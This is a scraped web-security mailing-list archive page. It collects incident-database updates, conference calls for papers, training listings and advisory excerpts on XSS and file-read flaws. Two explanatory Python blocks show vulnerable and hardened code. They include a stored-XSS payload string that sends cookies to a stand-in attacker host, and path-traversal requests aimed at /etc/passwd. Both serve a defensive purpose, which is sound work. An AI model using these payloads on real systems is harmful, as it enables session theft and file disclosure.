

Web Application Security

Web Hacking Incidents update for Feb 10th

The Web Hacking Incidents Database (http://whid.webappsec.org), or WHID for
short, is a Web Application Security Consortium (http://www.webappsec.org)
project dedicated to maintaining a list of web application related security
incidents. WHID's goal is to serve as a tool for raising awareness of the web
application security problem and to provide information for statistical
analysis of web application security incidents.

The following incidents were added to WHID last week:

* WHID 2009-19: Kaspersky site breached using SQL injection, sensitive data

[TOOL] moth - vulnerable web application vmware

List,

Moth is a VMware image with a set of vulnerable Web Applications and
scripts, that you may use for:
    - Testing Web Application Security Scanners
    - Testing Static Code Analysis tools (SCA)
    - Giving an introductory course to Web Application Security

The motivation for creating this tool came after reading
"anantasec-report.pdf" which is included in the release file which you

2nd. OWASP Ibero-American Web-Applications Security conference (IBWAS’10) - Call for Training

- Starting and Managing Secure Development Lifecycle Programs

- Technology specific presentations on security such as AJAX, XML, etc

- Web Application Security countermeasures

- Web Application Security Testing

- Web Services, XML and Application Security


Weekly Web Hacking Incidents update for Feb 25th


To continuously learn about new incidents, subscribe to the WHID RSS at
http://whid.webappsec.org/whid/rss.


Latest web hacking incidents

Following are the latest additions to the Web Hacking Incidents Database
(WHID), a Web Application Security Consortium project. For further
information about the incidents including reference to further
information about each incident, refer to WHID's site at
http://www.webappsec.org/projects/whid/


WHID 2007-48: MSU investigating hacking incident
        Reported: 17 October 2007

WASC Announcement: 2008 Web Application Security Statistics Published

The Web Application Security Consortium (WASC) is pleased to announce
the WASC Web Application Security Statistics Project 2008. This
initiative is a collaborative industry wide effort to pool together
sanitized website vulnerability data and to gain a better understanding
about the web application vulnerability landscape.

The statistics were compiled from web application security assessment
projects carried out by the following companies in 2008 (in
alphabetical order):

IBWAS'10 CfTraining - Deadline Approaching

- OWASP Tools and Projects

- Privacy Concerns with Applications and Data Storage

- Secure Coding Practices (J2EE/.NET)

- Starting and Managing Secure Development Lifecycle Programs

- Technology specific presentations on security such as AJAX, XML, etc

- Web Application Security countermeasures

- Web Application Security Testing

- Web Services, XML and Application Security

- Anything else relating to OWASP and Application Security



Proposals on topics not listed above but related to the conference (i.e. which are related to Application Security) may also be accepted.


Re: [WEB SECURITY] [TOOL] moth - vulnerable web application vmware

Andres Riancho wrote:
> List,
> 
> Moth is a VMware image with a set of vulnerable Web Applications and
> scripts, that you may use for:
>     - Testing Web Application Security Scanners
>     - Testing Static Code Analysis tools (SCA)
>     - Giving an introductory course to Web Application Security
> 
> The motivation for creating this tool came after reading
> "anantasec-report.pdf" which is included in the release file which you

Weekly Web Hacking Incidents update for Feb 19th


The last week was very rich in Web Hacking Incidents. Too rich. The
following incidents were added to WHID last week:


Web Hacking Incidents update for Feb 10th (Links corrected)

(Sorry for the duplicate sending; the links in the original post were broken)


The following incidents were added to WHID last week:

WASC Announcement: 2007 Web Application Security Statistics Published

The Web Application Security Consortium (WASC) is pleased to announce
the WASC Web Application Security Statistics Project 2007. This
initiative is a collaborative industry wide effort to pool together
sanitized website vulnerability data and to gain a better understanding
about the web application vulnerability landscape.

Goals
1. Identify the prevalence and probability of different vulnerability classes

[MajorSecurity SA-071] phpFaber CMS - Multiple stored Cross-site Scripting issues

Web applications should never trust user-generated input and should therefore sanitize all input.

MajorSecurity
================
MajorSecurity is a German penetration testing and security research company which focuses
on web application security. We offer professional penetration tests, security audits,
source code reviews and PCI DSS compliance tests.

Workaround
================
Do not browse untrusted sites or follow untrusted links while being logged-in to the application.
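The advisory above names stored cross-site scripting in phpFaber CMS, but the excerpt carries no vulnerable code or payload. The following Python is an added example, not the advisory's or phpFaber's code: it shows the pattern behind stored XSS (text from the database concatenated straight into HTML) next to the output-encoding fix that the advice above amounts to in practice, and it goes one step past the advisory by covering the attribute case, where escaping alone is not enough. The template, the field names and the sample payloads are assumptions constructed for the example.

```python
import html
from typing import Tuple
from urllib.parse import urlsplit

# Constructed sample of attacker-supplied content as it might sit in a CMS
# database after a comment or profile form accepted it unchecked. Not taken
# from the advisory, which publishes no payload.
ATTACKER_COMMENT = (
    '<script>new Image().src="http://attacker.example/c?"+'
    "document.cookie</script>"
)
ATTACKER_URL = "javascript:alert(document.domain)"


def render_comment_vulnerable(author: str, body: str, homepage: str) -> str:
    """Stored XSS: values from the database are dropped into the HTML as-is.
    Every visitor who views the page runs whatever the author stored."""
    return (
        f'<div class="comment"><a href="{homepage}">{author}</a>: '
        f"{body}</div>"
    )


def safe_href(url: str) -> str:
    """URL attributes need a scheme allow-list as well as escaping:
    html.escape() leaves 'javascript:...' untouched because it contains no
    HTML-special characters. Only absolute http(s) links are allowed here;
    anything else is replaced by a harmless '#'."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_comment_hardened(author: str, body: str, homepage: str) -> str:
    """Same template, with every stored value encoded at output time for the
    HTML context it lands in. quote=True also escapes ' and ", which is what
    makes the values safe inside a quoted attribute."""
    return (
        f'<div class="comment"><a href="{safe_href(homepage)}">'
        f"{html.escape(author, quote=True)}</a>: "
        f"{html.escape(body, quote=True)}</div>"
    )


def demo() -> Tuple[str, str]:
    """Render the constructed payload both ways and return the two fragments."""
    unsafe = render_comment_vulnerable("mallory", ATTACKER_COMMENT, ATTACKER_URL)
    safe = render_comment_hardened("mallory", ATTACKER_COMMENT, ATTACKER_URL)
    return unsafe, safe


if __name__ == "__main__":
    unsafe_html, safe_html = demo()
    print("vulnerable:", unsafe_html)
    print("hardened:  ", safe_html)
```

The hardened version encodes at the point of output rather than at input time: the stored text stays intact for other consumers (search, plain-text e-mail), and each output context gets the encoding it needs. For values placed inside JavaScript, CSS or a URL query string, a different encoder applies; the scheme allow-list in `safe_href` is the attribute-context example of that rule.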

[Announcement] ClubHack Mag Issue 22- Nov 2011 Released

This issue covers following articles:-

0x00 Tech Gyan - Looking Into the Eye of the Bits
0x01 Tool Gyan - Ravan – JavaScript Distributed Computing System
0x02 Mom's Guide - Best Practices of Web Application Security
0x03 Legal Gyan - Law relating to Cyberterrorism
0x04 Matriux Vibhag - OWASP Mantra’s MoC Crawler
0x05 Poster - Ravan

Check http://chmag.in/ for articles.

LayerOne 2009 - Registration Open, Initial Speakers Announced

speakers being announced regularly. We still have a few open slots
that we need to fill, so if you are interested in speaking at this
year’s event please submit a paper via our CFP address of ‘cfp <at>
layerone <dot> info’.  Our current selection of speakers covers a wide
range of interests. We will have presentations covering such topics as
Web Application Security, GnuRadio, Lockpicking Forensics, Security
Consulting, and DNSSEC. Our speakers come from a wide variety of
backgrounds and are all subject matter experts in their respective
fields.

Pre-Registration has opened for this year’s event. The

HITBSecConf2008 - Malaysia: Online registration closes on 24th Oct

TECH TRAINING 2 - Bluetooth, RFID & Wireless Hacking - UPDATED COURSE
CONTENTS!
Trainers: Andrew 'Q' Righter (HacDC) and King Tuna
Seats Left: 9

TECH TRAINING 3 - Web Application Security - Advanced Attacks and Defense
Trainer: Shreeraj Shah (Director, BlueInfy)
Seats Left: CLASS IS FULL

TECH TRAINING 4 - The Exploit Laboratory 3.0 - UPDATED COURSE CONTENTS!
Trainers: Saumil Shah (Founder/CEO, Net-Square) & SK Chong (Security

Certification for Web Application Security Professionals

The Web Application Security Consortium (www.webappsec.org) and SANS 
(www.sans.org) have partnered to define, train, test and certify 
individuals. WASC is a leading web application security organization and 
SANS is a leader in training and certification. Together they have the 
subject matter expertise and process expertise to make this a huge success.

We are doing a survey of the topics to be covered in the certification. We 
request you to spare a few minutes to take the survey.

For more details about the certification: 

radware AppWall Web Application Firewall: Source code disclosure on management interface

Product Description
---------------------------------------
Radware's AppWall is a Web application firewall (WAF) appliance that
secures Web applications. It enables PCI compliance by mitigating Web
application security threats and vulnerabilities to prevent data theft
and manipulation of sensitive corporate and customer information.
AppWall incorporates advanced, patent-protected Web application security
filtering technologies to seamlessly detect threats, block attacks and
report events.
[Source:

[waraxe-2010-SA#077] - Multiple Vulnerabilities in Calibre 0.7.34

Impact: remote attacker can read arbitrary files on the target system

So, I was interested in e-book management software and after some research found
Calibre. It has a useful feature - Content Server. Basically it's a web server, based
on CherryPy, written in Python. As I specialize in Web Application Security, I
obviously spent some time playing with it.
I used Firefox with the Live HTTP Headers add-on, which provides an easy way to observe
HTTP requests and responses. This is what got my attention:

http://localhost:8080/static/browse/browse.css
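The advisory above states the impact (a remote attacker can read arbitrary files) and the static URL that caught the author's eye, but the excerpt cuts off before the details, so nothing below should be read as the Calibre bug or as Calibre's code. As an added example, here is the check a static-file route needs regardless of framework: decode and normalise the requested path, then confine the result to the document root. The document root and the sample requests are constructed for the example; the traversal forms shown are the generic ones, not a payload from the advisory.

```python
import posixpath
from typing import Dict, List, Optional
from urllib.parse import unquote


def resolve_static_path(doc_root: str, url_path: str) -> Optional[str]:
    """Map the part of a URL after /static/ onto a file under doc_root.

    Returns the normalised filesystem path, or None when the request would
    resolve outside doc_root. Paths are handled as POSIX paths so the result
    is deterministic; backslashes are folded to '/' first, since Windows
    treats them as separators too."""
    # Decode once, as the server does, so %2e%2e is seen as '..'. A value
    # that is still encoded after one pass ('%252e') stays a literal name.
    decoded = unquote(url_path).replace("\\", "/")
    # NUL bytes would truncate the name in C-level file APIs; refuse them.
    if "\x00" in decoded:
        return None
    # Drop leading slashes so join() cannot treat the request as absolute.
    relative = decoded.lstrip("/")
    root = posixpath.normpath(doc_root)
    candidate = posixpath.normpath(posixpath.join(root, relative))
    # Containment check: after normalisation the candidate must be the root
    # itself or lie strictly below it. A bare string prefix is not enough
    # ('/srv/static2' starts with '/srv/static'), hence the trailing '/'.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed requests: two legitimate, the rest attempts to leave the root.
SAMPLE_REQUESTS: List[str] = [
    "browse/browse.css",
    "browse/../browse/browse.css",
    "../../../etc/passwd",
    "%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "..%5c..%5cwindows%5cwin.ini",
    "/browse/browse.css",
]


def triage(doc_root: str, requests: List[str]) -> Dict[str, Optional[str]]:
    """Run each request through the check; None marks a rejected request."""
    return {r: resolve_static_path(doc_root, r) for r in requests}


if __name__ == "__main__":
    for req, resolved in triage("/srv/calibre/static", SAMPLE_REQUESTS).items():
        print(f"{req!r:40} -> {resolved}")
```

In a real handler, follow this with os.path.realpath() on the candidate and repeat the containment check, so that a symlink inside the root cannot point back outside it, and serve only regular files. Rejecting on the normalised result rather than on the presence of ".." in the raw string is what makes the encoded and backslash variants fall out of the same check.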

Ruxcon 2010 Final Call For Papers

   * Exploitation Techniques
   * Rootkit Development
   * Code Analysis
   * Forensics and Anti-Forensics
   * Embedded Device Security
   * Web Application Security
   * Network Traffic Analysis
   * Wireless Network Security
   * Cryptography and Cryptanalysis
   * Social Engineering
   * Law Enforcement Activities

Ruxcon 2010 Call For Papers

    o Exploitation Techniques
    o Rootkit Development
    o Code Analysis
    o Forensics and Anti-Forensics
    o Embedded Device Security
    o Web Application Security
    o Network Traffic Analysis
    o Wireless Network Security
    o Cryptography and Cryptanalysis
    o Social Engineering
    o Law Enforcement Activities

Re: [WEB SECURITY] Re: Link Injection Redirection Attacks - Exploiting Google Chrome Design Flaw

>     of the stringent attacks.
>     Well to be ethical in this regard these are not the recent attacks but
>     have been persisting for a long time. The only
>     difference is the exploitation ratio has increased from bottom to top.
>     So that's the prime reason it has been
>     included in the web application security benchmarks. But the
>     projection
>     of redirection attacks is active now.
>
>     This post is not about explaining the basics of redirection issues. It
>     is more about the design vulnerabilities

Link Injection Redirection Attacks - Exploiting Google Chrome Design Flaw

of the stringent attacks.
Well to be ethical in this regard these are not the recent attacks but
have been persisting for a long time. The only
difference is the exploitation ratio has increased from bottom to top.
So that's the prime reason it has been
included in the web application security benchmarks. But the projection
of redirection attacks is active now.

This post is not about explaining the basics of redirection issues. It
is more about the design vulnerabilities
in browsers that can lead to potential persistent redirection

OpenNMS Multiple Vulnerabilities

Among its services: Penetration Testing, Risk Assessments, Secure Code
Development and Guidance.

BugSec Solutions develops innovative products and tools which give
focused solutions to systems and data security
issues, such as Web Application Security, Secure Coding and
Anti-Phishing solutions.



References

Shakacon Security Conference - Trainers and Speakers Finalized

Deviant Ollam - 1 Day Course
   \__Mastery of Physical Security
 
Joe McCray - 2 Day Course
   \__Crash Course on Penetration Testing & Web Application Security
 
Jared DeMott - 3 Day Course
   \__Application Security: For Hackers and Developers
 
Scott Lambert & Jason Geffner - 3 Day Course

AppSec DC 2012 CFP EXTENDED!

On Wed, Oct 12, 2011 at 9:43 AM, AppSec DC <cfp@appsecdc.org> wrote:
>
> Colleagues,
>
> Building on the success of AppSec DC 2010 and 2009, OWASP is pleased to announce the next OWASP AppSec DC conference.  The theme for this year's conference is "OWASP - Not just webapps anymore" to reflect the new and revised scope of OWASP to include all application security issues instead of focusing just on web application security.
>
> Owing to feedback from the past two years, and in alignment with the overall OWASP Conference mission, the AppSec DC Planners have decided to move the conference to April of 2012. This is in response to requests from a variety of our sponsors and vendors, and de-conflicts overlap in the OWASP conference schedule for North America.  OWASP AppSec DC 2012 will be held at the Walter E. Washington Convention Center on April 2nd through April 5th.  Plenary sessions will be on April 4th and 5th preceded by Application Security Training on April 2nd and 3rd.
>
> In accordance with the broader OWASP mission stemming from the 2011 OWASP Global Summit, AppSec DC is working to reflect the move of OWASP towards embracing all facets of Application Security, and not restricting its content strictly to the realm of web applications. Therefore we invite all practitioners of application security and those who work with or interact with all facets of application security to submit papers and participate in the conference.
>

Ruxcon 2012 Call For Papers

    o Exploitation Techniques
    o Rootkit Development
    o Code Analysis
    o Forensics and Anti-Forensics
    o Embedded Device Security
    o Web Application Security
    o Network Traffic Analysis
    o Wireless Network Security
    o Cryptography and Cryptanalysis
    o Social Engineering
    o Law Enforcement Activities

AppSec DC 2012 CFP is OPEN!

Building on the success of AppSec DC 2010 and 2009, OWASP is pleased
to announce the next OWASP AppSec DC conference.  The theme for this
year's conference is "OWASP - Not just webapps anymore" to reflect the
new and revised scope of OWASP to include all application security
issues instead of focusing just on web application security.

Owing to feedback from the past two years, and in alignment with the
overall OWASP Conference mission, the AppSec DC Planners have decided
to move the conference to April of 2012. This is in response to
requests from a variety of our sponsors and vendors, and de-conflicts

OWASP Mumbai Meeting : 6th Sep 2007

Interested in Speaking at the event??

1. The topic of the event should be "Privacy in the 21st Century", so all talks should be related to it (we should be addressing the Web Application side of Privacy, for example what happens to Privacy with SQL Injection, XSS and issues like pdp's Snoop).

2. All events are recommended to have the same panel discussion on the subject "What is the current state of Privacy in Web Application Security, and what should we be focusing on?".

3. Drop in a mail to dharmeshmm at mastek dot com to confirm your presentation.



Ruxcon 2011 Call For Papers

    o Exploitation Techniques
    o Rootkit Development
    o Code Analysis
    o Forensics and Anti-Forensics
    o Embedded Device Security
    o Web Application Security
    o Network Traffic Analysis
    o Wireless Network Security
    o Cryptography and Cryptanalysis
    o Social Engineering
    o Law Enforcement Activities

First ever ModSecurity public training at OWASP/WASC conf in SJ

also be in attendance for portions of the class. So, if you ever wanted
a chance to learn more about ModSecurity and to pick the brains of the
ModSecurity experts, this is your chance :)

In the true nature of open source, most of the proceeds from the
course go to OWASP, the Open Web Application Security Project, for
open source projects and activities promoting web application security.

For more details, a complete program and registration go to:
https://www.owasp.org/index.php/7th_OWASP_AppSec_Conference_-_San_Jose_2007/Training


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
